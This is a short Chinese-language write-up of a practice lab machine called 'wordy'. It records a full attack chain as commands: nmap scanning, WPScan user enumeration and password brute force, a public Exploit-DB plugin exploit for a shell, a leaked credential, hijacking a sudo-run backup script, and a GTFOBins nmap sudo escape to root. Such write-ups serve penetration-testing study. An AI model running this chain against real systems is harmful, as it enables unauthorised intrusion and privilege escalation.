kali：192.168.111.111

靶机：192.168.111.247

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.247

访问目标80端口发现重定向到http://wordy，修改/etc/hosts之后访问

使用wpscan爆破目标用户

wpscan --url http://wordy -e u

爆破用的密码字典根据作者提示可以进行筛选

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破出mark用户的密码

wpscan --url http://wordy -U user.txt -P passwords.txt

漏洞利用

登录后台后发现存在漏洞的插件

利用exp拿shell

cp /usr/share/exploitdb/exploits/php/webapps/50110.py .
python3 50110.py

提权

在/home/mark/stuff/things-to-do.txt提示用户信息：graham|GSo7isUM1D4

切换到graham用户查看sudo权限

修改/home/jens/backups.sh文件，切换到jens用户

echo '/bin/bash' > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

查看jens用户的sudo权限

提权方法：https://gtfobins.github.io/gtfobins/nmap/#sudo

TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
chmod 777 /tmp/tmp.zAaLfg44ZA
sudo -u root nmap --script=$TF

flag